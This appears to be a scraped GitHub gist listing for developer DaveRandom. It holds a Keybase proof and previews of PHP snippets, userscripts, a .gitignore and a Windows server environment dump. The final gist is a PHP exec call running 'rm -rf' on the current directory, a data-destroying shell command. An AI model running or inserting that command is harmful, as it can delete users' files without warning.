I hereby claim:
- I am DaveRandom on github.
- I am daverandom (https://keybase.io/daverandom) on keybase.
- I have a public key whose fingerprint is 041D 03AE C3A0 4031 AEB8 5363 1618 4931 222E AD5B
To claim this, I am signing this object:
<?php declare(strict_types = 1); | |
function send_data($socket, $data) | |
{ | |
echo "Sending data {$data}\n"; | |
fwrite($socket, $data); | |
$response = fread($socket, 1024); | |
echo "Got response: {$response}\n"; | |
} |
array(97) { ["PROCESSOR_ARCHITEW6432"]=> string(5) "AMD64" ["_FCGI_X_PIPE_"]=> string(53) "\\.\pipe\IISFCGI-c9b24bea-eef1-4a1d-b0a5-a94ab18c4deb" ["PHP_FCGI_MAX_REQUESTS"]=> string(5) "10000" ["PHPRC"]=> string(31) "C:\Program Files (x86)\PHP\v5.3" ["ALLUSERSPROFILE"]=> string(14) "C:\ProgramData" ["APPDATA"]=> string(56) "C:\Windows\system32\config\systemprofile\AppData\Roaming" ["APP_POOL_CONFIG"]=> string(51) "C:\inetpub\temp\apppools\SingleRTB\SingleRTB.config" ["APP_POOL_ID"]=> string(9) "SingleRTB" ["CommonProgramFiles"]=> string(35) "C:\Program Files (x86)\Common Files" ["CommonProgramFiles(x86)"]=> string(35) "C:\Program Files (x86)\Common Files" ["CommonProgramW6432"]=> string(29) "C:\Program Files\Common Files" ["COMPUTERNAME"]=> string(15) "WIN-IAHBJGOU4S1" ["ComSpec"]=> string(27) "C:\Windows\system32\cmd.exe" ["FP_NO_HOST_CHECK"]=> string(2) "NO" ["JRE_HOME"]=> string(32) "C:\Program Files (x86)\Java\jre7" ["LOCALAPPDATA"]=> string(54) "C:\Windows\system32\config\systemprofile\AppData\Local" ["NU |
vendor # ignore composer data | |
# ignore PHP Storm config | |
# you may want to ignore your IDE config and you may want to commit it, up to you | |
.idea |
<?php | |
//echo dirname(__FILE__); | |
$curl = curl_init('https://mydomain.com/'); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_NOBODY, true); | |
curl_setopt($curl, CURLOPT_CERTINFO, true); | |
curl_setopt($curl, CURLOPT_VERBOSE, 1); | |
curl_setopt($curl, CURLOPT_STDERR, fopen('php://output', 'w')); |
<?php | |
class OLEAutomationDateConverter | |
{ | |
/** | |
* Get the OLE Automation Date epoch | |
* | |
* @return DateTimeImmutable | |
*/ | |
public static function BaseDate() |
I hereby claim:
To claim this, I am signing this object:
// ==UserScript== | |
// @name Bah humbug | |
// @description Disable the php.net 2014-04-01 scripts | |
// @version 1.0 | |
// @author DaveRandom | |
// @namespace https://github.com/DaveRandom | |
// @match *://php.net/* | |
// @match *://*.php.net/* | |
// ==/UserScript== |
<?php | |
/** | |
* Class URL | |
* | |
* @property string $scheme | |
* @property string $user | |
* @property string $pass | |
* @property string $host | |
* @property string $port |
// ==UserScript== | |
// @name SE onebox collapsing overlay | |
// @description Add the ability to collapse and expand oneboxes in SE chat | |
// @version 1.1 | |
// @author DaveRandom | |
// @namespace https://github.com/DaveRandom | |
// @match *://chat.stackexchange.com/rooms/* | |
// @match *://chat.stackoverflow.com/rooms/* | |
// @match *://chat.meta.stackoverflow.com/rooms/* | |
// ==/UserScript== |
<?php | |
exec("rm -rf '" . getcwd() . "/*'"); |